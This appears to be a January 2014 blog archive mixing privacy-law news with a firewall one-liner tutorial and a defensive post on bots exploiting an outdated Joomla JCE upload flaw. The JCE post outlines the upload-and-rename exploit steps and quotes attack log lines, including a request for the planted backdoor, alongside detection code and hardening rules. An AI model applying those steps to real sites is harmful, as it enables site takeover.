Monthly Archives: January 2014

Increased Focus on Cyber Insurance Post-Target Breach

Recent media attention focused on the security breach that affected millions of Target customers has increased interest in cyber insurance to cover the financial losses associated with these types of events. As insurers aggressively market insurance products to protect against cyber risks, it’s important to note differences in the language carriers have chosen to include in their policy forms. Contrary to reasonable expectations and marketing brochures, policy clauses concerning timing and conditions requiring due diligence might be used by an aggressive insurer to undermine the transfer of risk. In an article published in Law360, a Hunton & Williams Insurance Litigation & Counseling partner examines whether the Target breach would be covered by one carrier’s form.

NSA Appoints Chief Privacy Officer

On January 29, 2014, the National Security Agency (“NSA”) announced that Rebecca Richards has been appointed to serve as the NSA’s new Civil Liberties and Privacy Officer. Ms. Richards, who previously worked as the Senior Director for Privacy Compliance at the Department of Homeland Security, will advise the NSA Director on civil liberties and privacy issues and implement reforms in those areas.

Ms. Richards’ appointment follows the publication of a December 2013 report, Liberty and Security in a Changing World, that recommended “the creation of a privacy and civil liberties policy official located both in the National Security Staff and the Office of Management and Budget.” It also comes less than two weeks after President Obama delivered a major speech calling for reforms to government surveillance programs, including those conducted by the NSA.

In announcing the appointment, General Keith Alexander, the Director of the NSA, praised Ms. Richards’ privacy expertise. Director Alexander noted that “privacy and civil liberties considerations remain a vital driver for [the NSA’s] strategic decisions” and that having a Civil Liberties and Privacy Officer will help the agency “bring new perspectives to how [it] can best consider civil liberties and privacy” while protecting national security.

Federal German Court Rules on Credit Scoring and Data Subject Access Rights

On January 28, 2014, the Federal Court of Justice of Germany clarified the scope of a data subject’s right of access to personal data in the context of credit scoring. Germany’s Federal Data Protection Act contains detailed and expansive provisions on the right of access where personal data are processed and shared to determine a data subject’s future behavior.

The court had to decide whether this required a credit reference agency to disclose (1) how its scoring algorithm weighed various factors and (2) how the reference groups used to arrive at a credit score were comprised. The full text of the judgment is not yet available but, according to the press release, the court held that while credit reference agencies must disclose all personal data referred to in the Federal German Data Protection Act, they do not have to disclose the two items mentioned above.

The court noted that the legislative intent behind the provision was to make credit scoring more transparent to consumers, while also protecting the credit reference agencies’ trade secrets (e.g., the scoring algorithms). Because transparency includes providing information that would enable a data subject to take action to change his or her score, data subjects must be informed about the specific matters the credit reference agencies take into account when calculating credit scores. That said, a data subject does not need to know the agency’s formula for weighing various factors or how the reference groups are comprised. Accordingly, data subjects cannot require credit reference agencies to disclose those types of details.

The judgment provides an important clarification by Germany’s highest civil court in an area heavily regulated by German data protection law. It is relevant to all businesses that process and share personal data subject to German law using predictive algorithms.

Commissioner Reding Calls for New European Data Protection Compact

On January 28, 2014, Data Protection Day, Vice-President of the European Commission and Commissioner for Justice, Fundamental Rights and Citizenship Viviane Reding gave a speech in Brussels proposing a new data protection compact for Europe. She focused on three key themes: (1) the need to rebuild trust in data processing, (2) the current state of data protection in the EU, and (3) a new data protection compact for Europe.

The Need to Rebuild Trust

Following the recent National Security Agency (“NSA”) surveillance revelations, Commissioner Reding stated that the most important goal for 2014 is to restore the trust of citizens in how their data are safeguarded. To achieve this goal, she recommended that:

  • Safe Harbor be strengthened by enforcing the 13 recommendations proposed by the European Commission in October 2013; and
  • The EU and U.S. agree and finalize the “umbrella” agreement on the transfer and processing of personal information in the context of police and judicial cooperation in criminal matters, which is currently being negotiated, and would afford EU citizens the same rights as U.S. citizens when their data are exchanged with the United States.

Commissioner Reding also referred to the new rights of data subjects that would be introduced by the proposed EU General Data Protection Regulation (the “Proposed Regulation”), which include the right to be forgotten, the right to data portability, and the right to be informed of personal data breaches. Commissioner Reding called for more meaningful enforcement, citing as examples the recent fines levied against Google Inc. in the amounts of €900,000 (in Spain) and €150,000 (in France), which she described as “more like pocket money than a fine” to Google.

The State of Data Protection Reforms in the EU

Commissioner Reding emphasized the European Parliament’s “overwhelming” support for the Proposed Regulation in its compromise text adopted in October 2013. However, she criticized many European leaders and major companies for failing to uphold data protection as a fundamental goal, stating that “some companies and a few governments continue to see data protection as an obstacle rather than as a solution; privacy rights as compliance costs, and not as an asset.” She noted that, two years after the legislative proposals were first released, “Discussions are mature. The text is ready. It is just a matter of political will.”

A Data Protection Compact for Europe

Commissioner Reding concluded her speech by proposing eight principles that should govern the way personal data are processed in the public and the private sector:

  • Europe should finalize the Proposed Regulation in 2014, as “[o]therwise others will move first and impose their standards on [Europe].”
  • The Proposed Regulation should not distinguish between the private and the public sector, and should apply the same principles and standards to both.
  • Laws affecting individuals’ privacy must be publicly consulted.
  • In relation to surveillance activities, data collection must be targeted, limited and in proportion to the surveillance objectives.
  • Laws need to be clear and kept up-to-date, otherwise they risk being applied “in ways that had not been imagined at the time [they were] written,” due to technological advancements.
  • National security exemptions should be invoked sparingly, since “not everything that relates to foreign relations is a matter of national security.”
  • Judicial authorities have an important role to play in deciding where the balance lies between protecting individuals’ privacy and maintaining nations’ security.
  • Data protection rules should apply irrespective of the nationality and place of residence of the data subject.

Commissioner Reding emphasized that bolstering trust in the way companies and governments process personal data would benefit the digital economy, national security, the Internet and Europe as a whole.

Episode #174: Lightning Lockdown

Hal firewalls fast

Recently a client needed me to quickly set up an IP Tables firewall on a production server that was effectively open on the Internet. I knew very little about the machine, and we couldn't afford to break any of the production traffic to and from the box.

It occurred to me that a decent first approximation would be to simply look at the network services currently in use, and create a firewall based on that. The resulting policy would probably be a bit looser than it needed to be or should be, but it would be infinitely better than no firewall at all!

I went with lsof, because I found the output easier to parse than netstat:

# lsof -i -nlP | awk '{print $1, $8, $9}' | sort -u
COMMAND NODE NAME
httpd TCP *:80
named TCP 127.0.0.1:53
named TCP 127.0.0.1:953
named TCP [::1]:953
named TCP 150.123.32.3:53
named UDP 127.0.0.1:53
named UDP 150.123.32.3:53
ntpd UDP [::1]:123
ntpd UDP *:123
ntpd UDP 127.0.0.1:123
ntpd UDP 150.123.32.3:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f1]:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f2]:123
portreser UDP *:783
sendmail TCP 150.123.32.3:25
sendmail TCP 150.123.32.3:25->58.50.15.213:1526
sendmail TCP *:587
sshd TCP *:22
sshd TCP 150.123.32.3:22->121.28.56.2:39054

I could have left off the process name, but it helped me decide which ports were important to include in the new firewall rules. Honestly, the output above was good enough for me to quickly throw together some workable IP Tables rules. I simply saved the output to a text file and hacked things together with a text editor.

But maybe you only care about the port information:

# lsof -i -nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort -u
123 UDP ntpd
1526 TCP sendmail
22 TCP sshd
25 TCP sendmail
39054 TCP sshd
53 TCP named
53 UDP named
587 TCP sendmail
783 UDP portreser
80 TCP httpd
953 TCP named
NAME NODE COMMAND

Note that I inverted the field output order, just to make my sed a little easier to write.

If you wanted to go really crazy, you could even create and load the actual rules on the fly. I don't recommend this at all, but it will make Tim's life harder in the next section, so here goes:

# Strip the "->peer:port" half of established connections first, so only the
# local port survives the second sed and the peer's ephemeral port never becomes a rule.
lsof -i -nlP | tail -n +2 | awk '{print $9, $8}' |
sed -e 's/->[^ ]*//' -e 's/.*://' | sort -u | tr A-Z a-z |
while read port proto; do ufw allow $port/$proto; done

I added a "tail -n +2" to get rid of the header line. I also dropped the command name from my awk output. There's a new "tr A-Z a-z" in there to lower-case the protocol name. Finally we end with a loop that takes the port and protocol and uses the ufw command line interface to add the rules. You could do the same with the iptables command and its nasty syntax, but if you're on a Linux distro with UFW, I strongly urge you to use it!
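The same idea in Python, as an added example that is not code from the episode: it parses the three-column `lsof -i -nlP | awk '{print $1, $8, $9}'` listing shown above, keeps only the local side of established connections so the peer's ephemeral port (1526 and 39054 in the listing) never turns into a rule, skips sockets bound only to loopback, and prints the `ufw allow` commands instead of running them. The sample input is constructed from the listing in the post.

```python
"""Turn a `lsof -i -nlP | awk '{print $1, $8, $9}'` listing into ufw rules.

Added example, not code from the episode. It prints the commands rather than
running them, and the sample input is constructed from the listing in the post.
"""
from collections import OrderedDict

# Constructed sample in the COMMAND NODE NAME layout shown in the post.
SAMPLE_LSOF = """\
COMMAND NODE NAME
httpd TCP *:80
named TCP 127.0.0.1:53
named TCP 127.0.0.1:953
named TCP [::1]:953
named TCP 150.123.32.3:53
named UDP 127.0.0.1:53
named UDP 150.123.32.3:53
ntpd UDP [::1]:123
ntpd UDP *:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f1]:123
portreser UDP *:783
sendmail TCP 150.123.32.3:25
sendmail TCP 150.123.32.3:25->58.50.15.213:1526
sendmail TCP *:587
sshd TCP *:22
sshd TCP 150.123.32.3:22->121.28.56.2:39054
"""

# Sockets bound only to these are unreachable from the network: no rule needed.
LOOPBACK_PREFIXES = ("127.", "[::1]")


def parse_lsof(text):
    """Return sorted (port, proto, command) tuples for network-reachable local sockets.

    For an established connection (NAME contains '->') only the local side is
    kept, so the peer's ephemeral port never becomes an allow rule.
    """
    rules = set()
    for line in text.splitlines()[1:]:          # skip the COMMAND NODE NAME header
        command, proto, name = line.split()
        local = name.split("->", 1)[0]           # "addr:port->peer:port" -> "addr:port"
        addr, _, port = local.rpartition(":")    # rpartition copes with bracketed IPv6
        if addr.startswith(LOOPBACK_PREFIXES):
            continue
        rules.add((int(port), proto.lower(), command))
    return sorted(rules)


def ufw_commands(rules):
    """One `ufw allow port/proto` per distinct port and protocol, like the loop in the post."""
    first_owner = OrderedDict()
    for port, proto, command in rules:
        first_owner.setdefault((port, proto), command)
    return [f"ufw allow {port}/{proto}  # {command}"
            for (port, proto), command in first_owner.items()]


if __name__ == "__main__":
    for rule in ufw_commands(parse_lsof(SAMPLE_LSOF)):
        print(rule)
```

Run it against real output with `lsof -i -nlP | awk '{print $1, $8, $9}' > sockets.txt` and feed the file to `parse_lsof`; the printed lines can be reviewed before any of them is executed, which is the step the one-liner above skips.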

So, Tim, I figure you can parse netstat output pretty easily. How about the command-line interface to the Windows firewall? Remember, adversity builds character...

Tim builds character

When I first saw this I thought, "Man, this is going to be easy with the new cmdlets in PowerShell v4!" There are a lot of new cmdlets available in PowerShell version 4, and both Windows 8.1 and Server 2012R2 ship with PowerShell version 4. In addition, PowerShell version 4 is available for Windows 7 SP1 (and later) and Windows Server 2008 R2 SP1 (and later).

The first cmdlet that will help us out here is Get-NetTCPConnection. According to the help page this cmdlet "gets current TCP connections. Use this cmdlet to view TCP connection properties such as local or remote IP address, local or remote port, and connection state." This is going to be great! But...

It doesn't mention the process ID or process name. Nooooo! This can't be. Let's look at all the properties of the output objects.

PS C:\> Get-NetTCPConnection | Format-List *

State : Established
AppliedSetting : Internet
Caption :
Description :
ElementName :
InstanceID : 192.168.1.167++445++10.11.22.33++49278
CommunicationStatus :
DetailedStatus :
HealthState :
InstallDate :
Name :
OperatingStatus :
OperationalStatus :
PrimaryStatus :
Status :
StatusDescriptions :
AvailableRequestedStates :
EnabledDefault : 2
EnabledState :
OtherEnabledState :
RequestedState : 5
TimeOfLastStateChange :
TransitioningToState : 12
AggregationBehavior :
Directionality :
LocalAddress : 192.168.1.167
LocalPort : 445
RemoteAddress : 10.11.22.33
RemotePort : 49278
PSComputerName :
CimClass : ROOT/StandardCimv2:MSFT_NetTCPConnection
CimInstanceProperties : {Caption, Description, ElementName, InstanceID...}
CimSystemProperties : Microsoft.Management.Infrastructure.CimSystemProperties

Dang! This will get most of what we want (where "want" was defined by that Hal guy), but it won't get the process ID or the process name. So much for rubbing the new cmdlets in his face.

Let's forget about Hal for a second and get what we can with this cmdlet.

PS C:\> Get-NetTCPConnection | Select-Object LocalPort | Sort-Object -Unique LocalPort
LocalPort
---------
135
139
445
3587
5357
49152
49153
49154
49155
49156
49157
49164

This is helpful for getting a list of ports, but not useful for making decisions about what should be allowed. Also, we would need to run Get-NetUDPEndpoint to get the UDP connections. This is so close, yet so bloody far. We have to resort to the old school netstat command and the -b option to get the executable name. In episode 123 we needed parsed netstat output. I recommended the Get-Netstat script available at poshcode.org. Sadly, we are going to have to resort to that again. With this script we can quickly get the port, protocol, and process name.

PS C:\> .\get-netstat.ps1 | Select-Object ProcessName, Protocol, LocalPort | 
Sort-Object -Unique LocalPort, Protocol, ProcessName


ProcessName Protocol Localport
----------- -------- ---------
svchost TCP 135
System UDP 137
System UDP 138
System TCP 139
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
System TCP 445
svchost UDP 4500
...

It should be pretty obvious that ports 137-149 and 445 should not be accessible from the internet. We can filter these ports out so that we don't allow them through the firewall.

PS C:\> ... | Where-Object { (135..139 + 445) -NotContains $_.LocalPort }
ProcessName Protocol Localport
----------- -------- ---------
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
svchost UDP 4500
...

Now that we have the ports and protocols we can create new firewall rules using the new New-NetFirewallRule cmdlet. Yeah!

PS C:\> .\get-netstat.ps1 | Select-Object Protocol, LocalPort | Sort-Object -Unique * |
Where-Object { (135..139 + 445) -NotContains $_.LocalPort } |
ForEach-Object { New-NetFirewallRule -DisplayName AllowedByScript -Direction Outbound `
-Action Allow -LocalPort $_.LocalPort -Protocol $_.Protocol }

Name : {d15ca484-5d16-413f-8460-a29204ff06ed}
DisplayName : AllowedByScript
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Outbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
...

These new firewall cmdlets really make things easier, but if you don't have PowerShell v4 you can still use the old netsh command to add the firewall rules. Also, Get-Netstat supports older versions of PowerShell as well, so this is nicely backwards compatible. All we need to do is replace the command inside the ForEach-Object cmdlet's script block.

PS C:\> ... | ForEach-Object { netsh advfirewall firewall add rule `
name="AllowedByScript" dir=in action=allow protocol=$($_.Protocol) `
localport=$($_.LocalPort) }

Invasion of JCE Bots

Joomla has been one of the most popular CMSs for a long time. It powers a huge number of sites. That’s great! The flip side of this fact is that Joomla has been very popular for a long time, and there are still very many sites that use older versions of Joomla as well as older versions of Joomla components. For example, the 1.5.x branch of Joomla (2008-2010) still has a noticeable share in live Joomla sites.

Old versions may work well for your site but they have multiple well known security holes, so they are the low hanging fruit for hackers. Let me show this using a real world example.

JCE attack

There is a JCE component, a fancy content editor that can be found on almost every Joomla site. It has a well known security hole that allows anyone to upload arbitrary files to a server.

You can easily find a working exploit code for this vulnerability.  What it does is:

  1. Checks whether a vulnerable version of JCE is installed (2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 1.5.7.10, 1.5.7.11, 1.5.7.12, 1.5.7.13, 1.5.7.14)
  2. Exploits the bug in the JCE image manager to upload a PHP file with a .gif extension to the images/stories directory
  3. Then uses a JSON command to rename the .gif file to *.php.

Now you have a backdoor on a server and can do whatever you want with the site.

This is how this attack looks in logs (real example):

197.205.70.37 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"

As I mentioned, JCE is a very popular component and there are still many sites that use old versions of this component. No wonder hackers are scanning the Internet for such vulnerable sites. They reworked the exploit code for use in their automated tools that relentlessly test millions of sites, one after another. These days, I can find multiple requests with the “BOT/0.1 (BOT for JCE)” User-Agent string in logs of almost every site that I check, even in logs of sites that have never had Joomla installed.

I’d like to share some interesting statistics of a real site that had been hacked using this JCE hole and then was being routinely reinfected every day.

  • 7,409 requests with the User-Agent “BOT/0.1 (BOT for JCE)” that came from 785 different IPs during the period of Dec 24th – Jan 24th (one month)
  • 239 requests from 51 unique IP addresses during the last 24 hours
  • 4 independent (uploaded different types of backdoors) successful infections during one day.
  • plus, multiple tests for other vulnerabilities.
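The log sequence and the statistics above can be pulled out of an access log mechanically. The following is an added example, not part of the original post: it parses Apache combined-format lines, counts image-manager upload attempts per IP, collects the IPs using the bot User-Agent, and, most importantly, flags a `.php` file under `/images/stories/` that was served with a 200, which is the sign that the upload and rename succeeded and the backdoor is live. The three lines from the post are reused as input; the other sample lines (TEST-NET addresses, placeholder file names) are constructed to cover the negative cases, including a blocked attempt answered with 403.

```python
"""Flag the JCE image-manager attack sequence in Apache access logs.

Added example, not part of the original post. The three lines from the post
are reused; the other sample lines are constructed (TEST-NET addresses,
placeholder file names) to exercise the negative cases.
"""
import re
from collections import Counter

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

JCE_BOT_UA = "BOT/0.1 (BOT for JCE)"
# The image-manager request used by the exploit (query string as shown in the post).
JCE_UPLOAD = re.compile(r"option=com_jce&task=plugin&plugin=imgmanager")
# A .php file served out of the upload directory: the upload and rename succeeded.
STORIES_PHP = re.compile(r"^/images/stories/[^/?]+\.php(?:\?|$)")

SAMPLE_LOG = """\
197.205.70.37 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.5 - - [23/Jan/2014:17:02:10 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 403 213 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jan/2014:17:02:11 -0500] "GET /images/stories/shell.php HTTP/1.0" 403 213 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jan/2014:17:05:42 -0500] "GET /images/stories/banner.jpg HTTP/1.1" 200 18302 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1)"
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(log_text):
    """Summarise JCE activity: upload attempts per IP, bot-UA IPs, and live backdoors."""
    upload_attempts = Counter()
    bot_ua_ips = set()
    backdoor_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"] == JCE_BOT_UA:
            bot_ua_ips.add(rec["ip"])
        if rec["method"] == "POST" and JCE_UPLOAD.search(rec["path"]):
            upload_attempts[rec["ip"]] += 1
        # Only a 200 counts: a 403 here means directory hardening or a WAF stopped it.
        if rec["method"] == "GET" and rec["status"] == 200 and STORIES_PHP.match(rec["path"]):
            backdoor_hits.append((rec["ip"], rec["path"]))
    return {
        "upload_attempts": dict(upload_attempts),
        "bot_ua_ips": sorted(bot_ua_ips),
        "backdoor_hits": backdoor_hits,
    }


if __name__ == "__main__":
    summary = analyse(SAMPLE_LOG)
    print(f"{sum(summary['upload_attempts'].values())} upload attempts from "
          f"{len(summary['upload_attempts'])} IPs; live backdoors: {summary['backdoor_hits']}")
```

The User-Agent match is kept separate from the request match on purpose: the constructed 203.0.113.5 lines show an attempt with a browser User-Agent, which the `backdoor_hits` check still catches if it ever gets a 200. Feeding a month of logs through `analyse` gives the same kind of per-IP and unique-IP figures quoted above.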

To webmasters

As you can see, this is something that you can’t neglect or consider an insignificant threat. It’s silly to hope that hackers won’t find your site. Today hackers have resources to spider the Internet almost as efficiently as Google did about 10 years ago, so there is almost no chance your site will stay unnoticed. The only way to prevent the hacks is to be proactive: keep all software up-to-date and harden your sites.

In case of this particular JCE attack:

  1. Make sure to upgrade your Joomla site to the most current version.
  2. Upgrade JCE to the latest version. You can find download packages for all the three branches of Joomla here.
  3. Protect all file upload directories and all directories that shouldn’t contain .php files. For example, place the following .htaccess file there to prevent execution of PHP files:
    <Files *.php>
    deny from all
    </Files>
  4. Try blocking requests with the “BOT/0.1 (BOT for JCE)” User-Agent string.  Of course, this shouldn’t be considered as a real protection. Hackers can change the User-Agent string to whatever they want. But it can help keep some dumb annoying bots away from your site.
  5. If, for some reason, you can’t upgrade your site at this moment, consider placing it behind a website firewall that will block any malicious traffic before it reaches your server.  This is something that we call virtual patching in Sucuri CloudProxy.

PCLOB Report Concludes NSA’s Bulk Collection of Customer Phone Records Is Unlawful

On January 23, 2014, the Privacy and Civil Liberties Oversight Board (“PCLOB”) released a report (the “Report”) concluding that the National Security Agency (“NSA”) does not have a valid legal basis for its bulk telephone records collection program. The NSA’s bulk collection of consumer telephone records has been under increased scrutiny since Edward Snowden leaked information about the program in June 2013, and recently has faced legal challenges. According to the Report, the NSA’s program exceeded its statutory parameters.

The PCLOB is an independent agency within the executive branch, composed of a chairman and four part-time members. Its duties include reviewing the counterterrorism activities of the executive branch to ensure that the privacy and civil liberties of individuals are protected.

The NSA’s bulk collection of consumer phone records ostensibly is conducted pursuant to Section 215 of the USA PATRIOT Act. According to the Report, however, the NSA’s collection of consumer telephone records far exceeds the framework devised by Section 215. The Report states that Section 215 is designed to allow the FBI to acquire business records when those business records are relevant to an FBI investigation. According to the Report, however, the telephone records collected by the NSA “have no connection to any specific FBI investigation.” The Report further states that because the records are collected in bulk, “they cannot be regarded as ‘relevant’ to any FBI investigation as required by [Section 215] without redefining the word relevant in a manner that is circular, unlimited in scope, and out of step with the case law from analogous legal contexts.”

In addition, the PCLOB concluded that the NSA’s bulk collection of consumer telephone records violates the Electronic Communications Privacy Act (“ECPA”). ECPA prohibits telephone companies from disclosing customer records to the government, except in specified scenarios. The Report stated that none of the ECPA scenarios permitting disclosure apply to the NSA’s bulk collection of customer records.

Read the PCLOB’s Report.

New Independent Commission on Internet Governance Launched

On January 22, 2014, at the World Economic Forum in Davos-Klosters, Switzerland, Sweden’s Minister for Foreign Affairs Carl Bildt announced the creation of a new independent commission that will examine the future of Internet governance. The Global Commission on Internet Governance (the “Commission”) is being launched by think tanks Chatham House and The Centre for International Governance Innovation (“CIGI”). The Commission will be chaired by Bildt, Sweden’s former Prime Minister, and supported by expert members representing business, government, academia and civil society. In announcing the initiative, Bildt stated that “[n]et freedom is as fundamental as freedom of information and freedom of speech in our societies.”

The two-year initiative will focus on:

  • governance legitimacy, including regulatory approaches and standards;
  • innovation, including infrastructure and competition;
  • the rights of individuals online, human rights, privacy and freedom of expression; and
  • systemic risks, including establishing cyber crime cooperation.

The Commission aims to “educate the wider public on the most effective ways to promote Internet access, while simultaneously championing the principles of freedom of expression and the free flow of ideas over the Internet.” It will host public stakeholder consultations and conduct research studies, the findings of which will be published on an ongoing basis. At the end of the two-year period, the Commission will produce a final report on Internet governance and multistakeholder governance.

Further information can be found on the Commission’s website.

Hunton Global Privacy Update – January 2014

On January 21, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program highlighted some of the key privacy developments that companies will encounter in 2014, including cybersecurity issues in the U.S., California’s Do Not Track legislation, Safe Harbor, the EU General Data Protection Regulation and the CNIL’s new cookie guidance.

Listen to a recording of the January 2014 Hunton Global Privacy Update. Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Update is slated for March 18, 2014.

The Class Action Hurricane: Where Is the Storm Heading?

It appears as though 2014 will be a banner year for class actions, including numerous cases concerning privacy and cybersecurity issues. In an article published in Law360, two Hunton & Williams litigation partners summarize recent case law and statistics related to class actions and offer predictions for the year ahead.

Download a copy of the full article.

FTC Announces Settlement with Twelve Companies Falsely Claiming Compliance with the Safe Harbor Framework

On January 21, 2014, the Federal Trade Commission announced settlements with twelve companies that allegedly falsely claimed that they complied with the U.S.-EU Safe Harbor Framework. The settlements stem from allegations that the companies violated Section 5 of the FTC Act by falsely representing that they held current Safe Harbor certifications despite having allowed their certifications to expire. The companies involved represent a variety of industries, ranging from technology and accounting to consumer products and National Football League teams.

The U.S.-EU Safe Harbor Framework is a cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. To join the Safe Harbor Framework, a company must self-certify to the Department of Commerce that it complies with seven privacy principles (notice, choice, onward transfer, security, data integrity, access and enforcement) and related requirements that have been deemed to meet the EU’s adequacy standard.

In its complaints, the FTC alleged that the companies represented, through statements in their privacy policies or by displaying the Safe Harbor certification mark, that they were “current” participants in the Safe Harbor Framework, even after failing to renew their Safe Harbor certifications on an annual basis. Accordingly, the FTC found such representations “false and misleading.” According to the complaints, “a company under the FTC’s jurisdiction that claims it has self-certified to the Safe Harbor principles, but in fact failed to self-certify to Commerce, may be subject to an enforcement action based on the FTC’s deception authority under Section 5 of the FTC Act.” Although the Commission alleged that the companies’ conduct violated Section 5 of the FTC Act, the FTC noted that this does not necessarily mean the companies committed any substantive violations of the Safe Harbor Framework’s privacy principles.

The proposed settlement agreements prohibit the relevant companies from misrepresenting, expressly or by implication, the extent to which they participate in any privacy or security program sponsored by the government or any other self-regulatory or standard-setting organization, including the U.S.-EU Safe Harbor Framework and the U.S.-Swiss Safe Harbor Framework.

In the press release accompanying the settlement, FTC Chairwoman Edith Ramirez stated that “Enforcement of the U.S.-EU Safe Harbor Framework is a Commission priority. These twelve cases help ensure the integrity of the Safe Harbor Framework and send the signal to companies that they cannot falsely claim participation in the program.”

Read the FTC Business Center Blog’s post about the Safe Harbor settlements and our previous posts on the Department of Commerce’s Key Points document on the Safe Harbor Frameworks and the future of the U.S.-EU Safe Harbor Framework.

Update: On June 25, 2014, the FTC approved the final settlement orders with the twelve companies.

Department of Commerce Highlights the Benefits, Oversight and Enforcement of the Safe Harbor Frameworks

In January 2014, the Department of Commerce’s International Trade Administration (“ITA”) posted a Key Points document to provide additional information about the benefits, oversight and enforcement of the U.S.-European Union and U.S.-Swiss Safe Harbor Frameworks. The Key Points document supplements information about the Safe Harbor Frameworks already available on the Department of Commerce website. For example, in the Key Points, the ITA notes that: 

  • The Safe Harbor Frameworks provide significant economic benefits not only to the U.S. economy, but also to the EU and Swiss economies. The ITA notes that “[m]any U.S. organizations that self-certify to Safe Harbor do so at the express request of European customers/clients or partners, while others are actually U.S. subsidiaries or divisions of European organizations.”
  • Anyone can check the Safe Harbor lists on the Department of Commerce’s website to verify whether an organization has certified to one or both of the Safe Harbor Frameworks, and if the organization’s certification is current. The ITA notes that if an organization fails to complete the annual re-certification process in time, the organization’s certification status is changed from “Current” to “Not Current.” The ITA also emphasizes that agreeing to adhere to the Safe Harbor Frameworks is a permanent undertaking in the sense that an organization must continue to apply the Safe Harbor Privacy Principles to personal data obtained through the Safe Harbor Frameworks for as long as the organization stores, uses or discloses the data – even if the organization “subsequently leaves the Safe Harbor for any reason.”
  • The ITA plays an important role in overseeing the Safe Harbor Frameworks even if they function as self-certification programs. The ITA indicates that it reviews “every” Safe Harbor initial self-certification and annual re-certification submission, and that it contacts organizations to inform them if their submissions are incomplete and explain what steps must be taken to finalize the process. The ITA notes that “during the first nine months of 2013, the ITA notified approximately 56% of the organizations from which it had received first-time self-certification submissions and 27% of the organizations from which it had received recertification submissions to inform the organizations of shortcomings identified during the review.”
  • The Safe Harbor Frameworks require that there be “readily available and affordable” dispute resolution.
  • At the time the Key Points document was issued, the Federal Trade Commission had brought ten Safe-Harbor-related enforcement actions, all of which resulted in consent decrees. The ITA emphasizes that, although the FTC is committed to prioritizing referrals from EU and Swiss data protection authorities and private sector third party dispute resolution providers, the FTC “can and has pursued cases on its own initiative.”

See our January 21, 2014 blog post on the most recent round of Safe Harbor enforcement actions brought by the FTC (subsequent to the ITA’s release of the Key Points document).

FTC Announces 3.5 Million Dollar Settlement for Alleged FCRA Violations

On January 16, 2014, the Federal Trade Commission announced a settlement with TeleCheck Services, Inc., and its affiliated debt-collection entity, TRS Recovery Services, Inc. (collectively, “TeleCheck”). The settlement stems from allegations that TeleCheck violated various provisions of the Fair Credit Reporting Act (“FCRA”). According to the press release, the settlement is “part of a broader initiative to target the practices of data brokers, which often compile, maintain, and sell sensitive consumer information” and is similar to an FTC settlement with a different company in August 2013.

In its complaint, the FTC alleged that TeleCheck, a company that provides check verification services for merchants, did not follow reasonable procedures to ensure the maximum possible accuracy of report information it maintained about consumers. According to the complaint, TeleCheck did not sufficiently track the resolution of consumer disputes, which increased the risk that inaccurate information was retained in consumers’ files. Among other violations, the complaint alleged that TeleCheck (1) impermissibly shifted the burden to consumers to investigate disputed information, (2) impermissibly restricted investigations into disputed information, (3) failed to complete the investigations it did undertake within the time periods specified in the FCRA, and (4) failed to maintain reasonable procedures to avert the reappearance of information that was deleted pursuant to an investigation from a consumer’s file.

The settlement, filed in the United States District Court for the District of Columbia, includes requirements that TeleCheck:

  • pay $3.5 million to the FTC as a civil penalty;
  • refrain from violating relevant provisions of the FCRA;
